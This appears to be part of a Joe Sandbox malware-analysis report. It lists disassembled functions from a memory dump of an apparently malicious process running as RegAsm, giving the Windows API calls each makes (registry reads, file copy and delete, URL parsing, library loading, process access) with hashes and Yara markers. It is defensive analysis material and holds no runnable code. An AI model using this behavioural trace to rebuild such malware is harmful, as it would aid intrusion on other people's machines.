                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                                                                        • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                        • String ID: CurrentBuildNumber
                                                                                                                                                        • API String ID: 3676486918-1022791448
                                                                                                                                                        • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                        • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                                                                                                        • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                        • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                                                                                                        Function 0041566F Relevance: 7.6, APIs: 5, Instructions: 107registrystringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 004156A4
                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$OpenQueryValue_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3357907479-0
                                                                                                                                                        • Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                        • Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
                                                                                                                                                        • Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                        • Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94
                                                                                                                                                        Function 0041BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,75BF74F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75BF74F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CreatePointer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2024441833-0
                                                                                                                                                        • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                        • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                                                                                                        • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                                                        • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                                                                                                        Function 6C61C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C61C947
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C61C969
                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C61C9A9
                                                                                                                                                        • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C61C9C8
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C61C9E2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4191843772-0
                                                                                                                                                        • Opcode ID: 3d16d75e0a6152c015c0d08e1639128c2c4dd824fd0d44b3c4cbda8a940574d9
                                                                                                                                                        • Instruction ID: 9182dbbd48fbfa99d53aa6aca542cc13d50452dc9498d6d92e0f72b7ad89a2d8
                                                                                                                                                        • Opcode Fuzzy Hash: 3d16d75e0a6152c015c0d08e1639128c2c4dd824fd0d44b3c4cbda8a940574d9
                                                                                                                                                        • Instruction Fuzzy Hash: E2212C317062147BDB04AA69CCC4BAE73B9AB87745F500529FA07A7E40DB705C048BBD
                                                                                                                                                        Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                        • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                        • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CrackInternetlstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1274457161-0
                                                                                                                                                        • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                                                        • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                                                                                                                        • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                                                        • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                                                                                                                        Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                                                                        Strings
                                                                                                                                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                        • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                        • API String ID: 2929475105-1193256905
                                                                                                                                                        • Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                                                        • Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
                                                                                                                                                        • Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                                                        • Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89
                                                                                                                                                        Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                                                                        • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog3_catchlstrlen
                                                                                                                                                        • String ID: ERROR
                                                                                                                                                        • API String ID: 591506033-2861137601
                                                                                                                                                        • Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                                                        • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                                                                                                        • Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                                                                        • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                                                                                                        Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                        • String ID: =A
                                                                                                                                                        • API String ID: 3183270410-2399317284
                                                                                                                                                        • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                                                        • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                                                                                                        • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                                                                        • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                                                                                                        Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,00437414,0043681B,?,?,?), ref: 0040B3D7
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 211194620-0
                                                                                                                                                        • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                        • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                                                                                        • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                                                        • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                                                                                        Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
